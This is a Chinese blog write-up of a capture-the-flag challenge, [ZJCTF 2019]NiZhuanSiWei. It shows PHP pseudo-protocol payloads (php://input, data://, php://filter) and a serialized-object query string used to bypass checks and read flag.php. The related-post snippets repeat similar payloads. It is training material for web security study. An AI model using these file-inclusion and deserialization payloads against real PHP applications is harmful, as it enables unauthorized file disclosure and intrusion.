BUUCTF:[ZJCTF 2019]NiZhuanSiWei 1

最新推荐文章于 2024-04-16 11:34:54 发布
最新推荐文章于 2024-04-16 11:34:54 发布
阅读量247 收藏
点赞数
分类专栏: BUUCTF刷题记录 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Zero_Adam/article/details/113734737
版权
本文记录了一次CTF比赛中的挑战,涉及PHP伪协议和文件包含漏洞的利用。作者通过分析源码,发现可以利用PHP的php://input和data://text/plain伪协议实现任意代码执行。在解码后的代码中找到了Flag类,并通过构造payload获取了flag。总结了对PHP伪协议和文件包含的敏感性不足之处,提供了POC示例。
摘要由CSDN通过智能技术生成

BUUCTF:[ZJCTF 2019]NiZhuanSiWei 1

水文,给自己做点记录

这个简单,但是我没做出来,,辣鸡!
就是一个简单的伪协议的应用,
源码自己去看

没有做出来的原因

  1. 想PHP伪协议,没有想全
  2. 对文件包含不够敏感

在这里插入图片描述
就做到这一步,主要是useless.php我没用到啊,里面的flag在什么变量里面我也不知道,里面有什么类我也不清楚。。。
不行,看WP了,,

--------------------------------------------------分割线-------------------------------------------------

对利用PHP伪协议的地方还是不够敏感,
对文件包含也不够敏感
在这里插入图片描述首先,看到这个,想到?text=php://input没问题,但是也要想到?text=data://text/plain,welcome to the zjctf。想到这两个可以造成任意代码执行的PHP伪协议
在这里插入图片描述
这里不要笨笨的就传一个参数就好了,也可以用 PHP伪协议去读取啊
?text=php://input + post poc:welcome to the zjctf
用这个也可以的?text=data://text/plain,welcome to the zjctf
两个都试过了,都成功
得:
PD9waHAgIAoKY2xhc3MgRmxhZ3sgIC8vZmxhZy5waHAgIAogICAgcHVibGljICRmaWxlOyAgCiAgICBwdWJsaWMgZnVuY3Rpb24gX190b3N0cmluZygpeyAgCiAgICAgICAgaWYoaXNzZXQoJHRoaXMtPmZpbGUpKXsgIAogICAgICAgICAgICBlY2hvIGZpbGVfZ2V0X2NvbnRlbnRzKCR0aGlzLT5maWxlKTsgCiAgICAgICAgICAgIGVjaG8gIjxicj4iOwogICAgICAgIHJldHVybiAoIlUgUiBTTyBDTE9TRSAhLy8vQ09NRSBPTiBQTFoiKTsKICAgICAgICB9ICAKICAgIH0gIAp9ICAKPz4gIAo=
解码:

<?php  

class Flag{  //flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  
?>

告诉我们在flag.php中有一个Flag类,调用tostring就好了file为flag.php
easy。poc:
?text=data://plain/text,welcome to the zjctf&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
还差一点,,…
在这里插入图片描述

。。。mdzz,无聊 F12
在这里插入图片描述

Zero_Adam
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUU--[ZJCTF 2019]NiZhuanSiWei
cadandme的博客
05-06 404
BUU–[ZJCTF 2019]NiZhuanSiWei 刷了一道题,思路是有一些了,但还是看大佬的wp才做出来,记录一下。 看了很久才知道要get传三个参数,第一个if是限制text,传入的内容在读取文件后必须是后边的一段,这个可以使用伪协议,但 php://input 使用这个协议时失败了,与之相似的写入文件的协议还有data协议,使用这个协议 ?text=data://text/plain;base64,[d2VsY29tZSB0byB0aGUgempjdGY=] 第二个if 这个来查看文件的,
[ZJCTF 2019]NiZhuanSiWei
brainw的博客
04-22 2626
[ZJCTF 2019]NiZhuanSiWei 代码审计 查看一下useless.php --只有注释信息 没有用 利用data协议绕过 将welcome to the zjctf写入 而data://协议允许读入 payload: text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY= 到这里就不会了 只有看下wp了 正则判断...
web buuctf [ZJCTF 2019]NiZhuanSiWei1
weixin_44214568的博客
03-14 1285
一共有三个参数,需要考虑传参,php传参,而且是text和file这样的值,基本可以考虑需要用php伪协议 , php伪协议是基于文件包含的,文件包含有本地包含和远程包含, 当包含的文件在远程服务器上时,就形成了远程文件包含。 远程文件包含需要在 php.ini 中设置: allow_url_include = on(是否允许 include/require 远程文件) allow_url_fopen = on(是否允许打开远程文件) php伪协议是php支持的协议和封装协议 贴(我从...
BUUCTF [ZJCTF 2019]NiZhuanSiWei1
biggerpig的博客
09-25 984
BUUCTF web类型题目[ZJCTF 2019]NiZhuanSiWei1详解
buuctf-[ZJCTF 2019]NiZhuanSiWei 1(小宇特详解)
小宇的web博客
01-21 3361
buuctf-[ZJCTF 2019]NiZhuanSiWei 1(小宇特详解) 这里打开之后是一段源码 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".
buuctf [ZJCTF 2019]NiZhuanSiWei
SopRomeo的博客
03-15 1235
给了一段源码,注释如下 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ //判断$text变量是否...
BUUCTF [ZJCTF 2019]EasyHeap
BengDouLove的博客
04-08 2743
Partial RELRO 那说明got表可写,可以通过改写got表为想要的函数,堆通常的利用方法 还是老样子,一个堆块管理系统,main函数太长了不放了,就是根据你的输入选择操作 值得一提的是有个这个 这个函数能dedaoflag吗??一会再说,反正system是有了,不用泄露libc了 1.create 可以看到,堆块最多有十个,,还是用了一张表维护着堆块的指针,,这样就让人想把这个...
BUUCTF [ZJCTF 2019]EasyHeap 记第一次堆入门
weixin_45441024的博客
12-27 653
BUUCTF [ZJCTF 2019]EasyHeap 记第一次堆入门 一般的堆题都是这种表单形式的
BUUCTF:[GWCTF 2019]你的名字 --- ssti -- bypass 学习
Zero_Adam的博客
04-22 1645
一、自己做: 抓包没啥,除非要扫目录, 啊,,就是直接返回的逻辑,,xss也是直接返回,也就说明有某些机制了,然后想去闭合一些标签,但是都没成功,</div>,</h1>,这些, 感觉没思路了,,扫扫目录把。 别了,想到了ssti,试了一下:{{2*2}},报错了 Parse error: syntax error, unexpected T_STRING, expecting '{' in \var\WWW\html\test.php on line 13 而且,还不能处理中文
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
BUUCTF:[SWPU2019]Web1 sql注入 MariaDB注入--无列名注入-group_concat ---- /**/---group by ----- 3.9修改
Zero_Adam的博客
02-24 4001
目录:一、自己做:二、不足&&学到的:三、学习WP1.测试看看过滤了那些关键字,(这里要多看看,学学)2.使用无列名注入:这里稍停一下:3.下面学习无列名注入: 无列名注入详解:无列名注入详解 参考自:本题目的详解 写博客只是为了输出学习而已, 无他 一、自己做: 发现了 那个广告的地方可能有漏洞 二、不足&&学到的: 尝试了ssti。却忘记了尝试sql注入。。。 过滤了order的时候,可以用group by 来测试有多少行 单引号闭合,正常闭合会出错的话,可以,
buuctf——[ZJCTF 2019]NiZhuanSiWei
最新发布
m_de_g的博客
04-16 516
该函数是用于把文件的内容读入到一个字符串中的首选方法。如果服务器操作系统支持,还会使用内存映射技术来增强性能。把整个文件读入一个字符串中。进行抓包传输,开始还一直以为是。方法二需要注意的是,需要使用。的问题,踩了一堆的坑。
buuctf-[ZJCTF 2019]NiZhuanSiWei
Nothing-one的博客
11-04 379
打开之后我们就可以进行php的代码审计。我们从头开始看起。 在第一个if中我们就可以看到要满足里面的等式才可以看到file_get_contents()函数的功能是读取文件内容到一个字符串,但这里没没有一个文件,而是读取的text变量。没查到相关这方面的用法,特别是那个r参数。 这里我们如果直接将text与这段话进行等值那么我们就可以看到这个网站没有回显,也就是说我们要想办法绕过这个。 用php的伪协议也就是data://伪协议来进行漏洞利用。 这里也就说明了我绕过了。 然后我们再看下一个if语句。 因为.
BUUCTF:[ZJCTF 2019]NiZhuanSiWei
末初的CSDN博客
11-05 1220
题目地址:https://buuoj.cn/challenges#[ZJCTF%202019]NiZhuanSiWei 老题目了 /?text=php://input&file=php://filter/read=convert.base64-encode/resource=useless.php POST内容 welcome to the zjctf useless.php <?php class Flag{ //flag.php public $file;.
[ZJCTF 2019]NiZhuanSiWei 1
qq_43618536的博客
07-03 414
BUUCTF的[ZJCTF 2019]NiZhuanSiWei 1
[ZJCTF 2019]NiZhuanSiWei BUUCTF
wuyaowangchuan的博客
12-04 297
进入环境 知识点 1:data伪协议写入文件 2:php:// php://filter用于读取源码 php://input用于执行php代码 伪协议利用解释:https://www.cnblogs.com/-chenxs/p/11571903.html <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_conte
BUUCTF [ZJCTF 2019]NiZhuanSiWei特详解(php伪协议+序列化与反序列化)
m0_55854679的博客
08-23 1989
[ZJCTF 2019]NiZhuanSiWei <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($te
BUUCTF__[ZJCTF 2019]NiZhuanSiWei_题解
风过江南乱的博客
07-06 1968
BUUCTF__[ZJCTF 2019]NiZhuanSiWei_题解 PHP伪协议 php://input data:// php://filter
C++ PWN题解析:ZJCTF 2019 Login漏洞利用
"BUUCTF-PWN-[ZJCTF 2019]Login 是一个关于网络安全竞赛中的Pwn(破解)类题目,主要涉及到C++编程、汇编语言分析以及栈溢出漏洞的利用。" 该题目描述了一个登录系统,参赛者需要通过输入正确的账号和密码来访问...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值